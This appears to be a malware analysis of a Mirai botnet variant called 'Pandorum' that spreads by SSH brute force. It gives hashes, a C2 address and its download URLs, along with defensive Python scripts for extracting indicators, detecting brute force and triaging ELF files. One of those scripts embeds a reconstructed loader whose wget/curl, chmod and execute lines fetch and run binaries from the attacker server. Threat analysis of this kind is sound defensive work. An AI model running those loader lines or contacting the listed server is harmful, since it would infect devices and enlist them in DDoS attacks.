A sample analysis of a 'Deep Space Forgetfulness' zombie network


Recent honeypot monitoring of the Mirai botnet's latest network activity shows that this botnet has been abnormally active, simultaneously launching attacks against multiple regions.

Pandorum ('Deep Space Forgetfulness') is a movie about a group of astronauts who have slept aboard a spaceship for many years and suddenly wake up with no memory, only to be attacked by unknown alien creatures. Mirai, too, has quietly become active again.


This sample is a botnet that primarily scans for SSH and brute-forces SSH credentials. The Mirai botnet was first identified by the malware research group MalwareMustDie in August 2016 and has been used in destructive distributed denial-of-service (DDoS) attacks ever since.

In the early hours of August 2, 2020, a shell script was captured; the sample exists in many versions.

0X00 Sample Introduction

Sample basic information:

Sample          MD5                                 Content
wget.sh         9db51258f44f6b45328e684f0bdcc08c    Shell script, downloads the SSH brute-force component
curl.sh         37924436b09df71b137f4e91a933d382    Shell script, downloads the Mirai botnet binary
w.arm8          a0cd59ae21434f9f6ef615ec3019698d    SSH brute-force component
pandorum.arm8   6507e48941a169d13cc54e982f230746    Mirai botnet binary

0X01 Detailed Analysis

The content of the wget.sh script (shown as an image in the original post) mainly consists of commands that download the different architecture versions of the SSH brute-force component, w.*.

The curl.sh script (also shown as an image in the original post) likewise downloads the different architecture versions of the Mirai binary, pandorum.*.

The botnet targets a range of CPU architectures, including ARM (arm, arm5, arm6, arm7, arm8), x86, x64, MIPS and MIPSEL (mpsl), among others. During infection the shell script downloads every sample in turn rather than selecting the build that matches the host's CPU architecture.

The infection chain therefore involves two shell scripts. wget.sh fetches the SSH brute-force component from the attacker-controlled server, and that component brute-forces SSH credentials; once a login succeeds, it establishes an SSH connection to the victim, downloads the Mirai botnet binary and executes it.
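Since the loader scripts only appear as images in the original post, the following Python snippet is an added example (not the post's own code) that extracts the IOCs from a loader written in the download, chmod, execute style described above. The script text it parses is constructed for the example and uses the URLs from the IOC section; the regular expressions and the uname / /proc/cpuinfo test used to decide whether the loader selects a build are assumptions about how such loaders are written.

```python
import re
from urllib.parse import urlparse

# Constructed loader script (assumption) in the download-chmod-execute style
# the post describes; the real wget.sh/curl.sh appear only as images there.
# The URLs are taken from the post's IOC list.
SAMPLE_LOADER = """\
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://46.246.41.29/w.arm8; chmod +x w.arm8; ./w.arm8; rm -rf w.arm8
wget http://46.246.41.29/w.mips; chmod +x w.mips; ./w.mips; rm -rf w.mips
curl -O http://46.246.41.29/pandorum.x86; chmod +x pandorum.x86; ./pandorum.x86; rm -rf pandorum.x86
curl -O http://46.246.41.29/pandorum.mpsl; chmod +x pandorum.mpsl; ./pandorum.mpsl; rm -rf pandorum.mpsl
"""

# A wget/curl invocation followed by the first http(s) URL on that command.
URL_RE = re.compile(r"""\b(?:wget|curl)\b[^;\n]*?(https?://[^\s;'"]+)""")
# A "./name" execution at the start of a line or after a ';'.
EXEC_RE = re.compile(r"(?:^|;)\s*\./([^\s;]+)", re.M)


def extract_iocs(script):
    """Pull download URLs, hosts, dropped file names and executed names."""
    urls = URL_RE.findall(script)
    hosts = sorted({urlparse(u).hostname for u in urls})
    files = [urlparse(u).path.rsplit("/", 1)[-1] for u in urls]
    executed = EXEC_RE.findall(script)
    return {"urls": urls, "hosts": hosts, "files": files, "executed": executed}


def is_spray_loader(script):
    """True when the loader fetches more than one architecture build and never
    gates the download on the host CPU (no uname / /proc/cpuinfo check)."""
    files = extract_iocs(script)["files"]
    suffixes = {f.rsplit(".", 1)[-1] for f in files if "." in f}
    gated = re.search(r"\buname\b|/proc/cpuinfo", script) is not None
    return len(suffixes) > 1 and not gated


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_LOADER)
    print("hosts:", iocs["hosts"])
    print("dropped:", iocs["files"])
    print("spray loader:", is_spray_loader(SAMPLE_LOADER))
```

Feeding a captured loader through `extract_iocs` gives the host and file list for blocking and hunting in one pass, and `is_spray_loader` records the "downloads everything" trait the post notes, which is itself a useful classifier when sorting loaders from different campaigns.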

The behavioral characteristics of w.arm8 are as follows:

2-1 Brute-force behavior characteristics

2-2 SSH connection and download of the Mirai botnet
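To catch the brute-force stage shown in figures 2-1 and 2-2 from the victim side, here is an added example (not part of the original analysis) that scans OpenSSH auth.log lines for a burst of failed logins followed by a successful login from the same source, which is the point at which w.arm8 would connect and fetch the Mirai binary. The log lines are constructed, the attacker address is a documentation IP rather than an IOC from the post, and the threshold and window are assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt in OpenSSH syslog format (assumption); the
# attacker address 203.0.113.5 is a documentation IP, not an IOC from the post.
SAMPLE_AUTH_LOG = """\
Aug  2 04:01:11 iot-gw sshd[1201]: Failed password for root from 203.0.113.5 port 51000 ssh2
Aug  2 04:01:12 iot-gw sshd[1202]: Failed password for root from 203.0.113.5 port 51001 ssh2
Aug  2 04:01:13 iot-gw sshd[1203]: Failed password for admin from 203.0.113.5 port 51002 ssh2
Aug  2 04:01:14 iot-gw sshd[1204]: Failed password for admin from 203.0.113.5 port 51003 ssh2
Aug  2 04:01:15 iot-gw sshd[1205]: Failed password for pi from 203.0.113.5 port 51004 ssh2
Aug  2 04:01:16 iot-gw sshd[1206]: Failed password for root from 203.0.113.5 port 51005 ssh2
Aug  2 04:01:18 iot-gw sshd[1207]: Accepted password for root from 203.0.113.5 port 51006 ssh2
Aug  2 04:05:00 iot-gw sshd[1300]: Failed password for alice from 198.51.100.7 port 40000 ssh2
Aug  2 04:05:30 iot-gw sshd[1301]: Accepted publickey for alice from 198.51.100.7 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse(log, year=2020):
    """Yield (timestamp, result, user, ip) for each sshd auth line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(log, threshold=5, window_s=60):
    """Return {ip: info} for sources with >= threshold failures inside window_s
    seconds. info['compromised'] is True when an Accepted login from the same
    IP follows the burst, i.e. the brute force succeeded."""
    fails, accepted = defaultdict(list), defaultdict(list)
    for ts, result, user, ip in parse(log):
        (fails if result == "Failed" else accepted)[ip].append((ts, user))
    hits = {}
    for ip, events in fails.items():
        times = [t for t, _ in events]
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_s:
                burst_end = times[i + threshold - 1]
                later = [(t, u) for t, u in accepted[ip] if t >= burst_end]
                hits[ip] = {
                    "failures": len(times),
                    "users": sorted({u for _, u in events}),
                    "compromised": bool(later),
                    "accepted_user": later[0][1] if later else None,
                }
                break
    return hits


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

A source that trips the burst check and then logs in is the host to isolate first: on an IoT device that is the moment the brute-force component opens its SSH session and pulls down pandorum.* from the download server.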

The behavioral characteristics of pandorum.arm8 are as follows:

2-3 Traces of the Mirai source code

This is a very typical feature of the Mirai botnet. YARA rules for detecting it are available at https://github.com/Neo23x0/signature-base/blob/master/yara/crime_mirai.yar:

2-4 Mirai YARA detection rules
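As a complement to the YARA rule referenced above, the following added example (not the post's code and not the referenced rule) triages a batch of dropped files the way a responder would after a loader has sprayed every architecture build: it reads e_machine from the ELF header to tell the builds apart and checks for a few strings from the leaked Mirai source. The ELF images are constructed inside the snippet, and the marker strings are an illustrative subset chosen here, not a replacement for the real rule.

```python
import struct

# ELF e_machine values (from the ELF specification) for the builds the loader
# drops; names follow the file suffixes in the post's IOC list where possible.
E_MACHINE = {
    0x02: "sparc", 0x03: "x86", 0x04: "m68k", 0x08: "mips", 0x14: "ppc",
    0x28: "arm", 0x2A: "sh4", 0x2D: "arc", 0x3E: "x64", 0x5E: "xtensa",
    0xB7: "arm8", 0xF3: "riscv",
}

# Illustrative strings from the leaked Mirai source (watchdog disabling in
# main.c, the killer's /proc/net/tcp scan, the VSE attack payload). This is an
# assumption-level subset for triage, not the referenced YARA rule.
MIRAI_MARKERS = [b"/dev/watchdog", b"/dev/misc/watchdog", b"/proc/net/tcp",
                 b"TSource Engine Query"]


def elf_arch(data):
    """Return (arch, bits, endianness) from an ELF header, or None for non-ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    bits = 64 if data[4] == 2 else 32                # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    fmt = "<H" if data[5] == 1 else ">H"              # EI_DATA: 1 = LSB, 2 = MSB
    (e_machine,) = struct.unpack(fmt, data[18:20])    # e_machine follows e_type
    arch = E_MACHINE.get(e_machine, "unknown(0x%x)" % e_machine)
    return arch, bits, "LE" if fmt[0] == "<" else "BE"


def mirai_markers(data):
    """Which of the illustrative Mirai strings are present in the file."""
    return [m.decode() for m in MIRAI_MARKERS if m in data]


def triage(name, data):
    """Classify one dropped file: architecture plus Mirai source-code markers."""
    hits = mirai_markers(data)
    return {"name": name, "arch": elf_arch(data), "markers": hits,
            "mirai_like": len(hits) >= 2}


def fake_elf(bits, little_endian, e_machine, payload):
    """Build a minimal constructed ELF image (header + strings) for the demo."""
    e_ident = (b"\x7fELF" + bytes([2 if bits == 64 else 1,
                                   1 if little_endian else 2, 1]) + b"\x00" * 9)
    e_type_machine = struct.pack(("<" if little_endian else ">") + "HH", 2, e_machine)
    return e_ident + e_type_machine + b"\x00" * 44 + payload


# Constructed stand-ins for the dropped files (not the real samples).
SAMPLES = {
    "pandorum.arm8": fake_elf(64, True, 0xB7,
        b"\x00/dev/watchdog\x00/dev/misc/watchdog\x00/proc/net/tcp\x00"),
    "w.mips": fake_elf(32, False, 0x08, b"\x00libssh\x00/proc/net/tcp\x00"),
    "curl.sh": b"#!/bin/sh\nwget http://46.246.41.29/pandorum.x86\n",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(triage(name, data))
```

Running this over a directory of dropped files separates the brute-force component from the Mirai payload and tells you which build actually matches the infected device, which is the one to pull into the sandbox first; the YARA rule at the link above then gives the authoritative verdict.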

0X02 Related IOCs

MD5:
9db51258f44f6b45328e684f0bdcc08c
37924436b09df71b137f4e91a933d382
a0cd59ae21434f9f6ef615ec3019698d
6507e48941a169d13cc54e982f230746

C2:
46.246.41.29

URLs:
http://46.246.41.29/wget.sh
http://46.246.41.29/curl.sh
http://46.246.41.29/w.arm8
http://46.246.41.29/w.arm7
http://46.246.41.29/w.arm6
http://46.246.41.29/w.arm5
http://46.246.41.29/w.arm
http://46.246.41.29/w.mips
http://46.246.41.29/w.mpsl
http://46.246.41.29/w.x64
http://46.246.41.29/w.x86
http://46.246.41.29/pandorum.arm8
http://46.246.41.29/pandorum.arm7
http://46.246.41.29/pandorum.arm6
http://46.246.41.29/pandorum.arm5
http://46.246.41.29/pandorum.arm
http://46.246.41.29/pandorum.arc
http://46.246.41.29/pandorum.mips64
http://46.246.41.29/pandorum.mips
http://46.246.41.29/pandorum.mpsl
http://46.246.41.29/pandorum.m68k
http://46.246.41.29/pandorum.risc
http://46.246.41.29/pandorum.risc64
http://46.246.41.29/pandorum.xtn
http://46.246.41.29/pandorum.ns2
http://46.246.41.29/pandorum.sh4
http://46.246.41.29/pandorum.x64
http://46.246.41.29/pandorum.x86
http://46.246.41.29/pandorum.x48
http://46.246.41.29/pandorum.x32
http://46.246.41.29/pandorum.spc
http://46.246.41.29/pandorum.blaze
http://46.246.41.29/pandorum.ppc
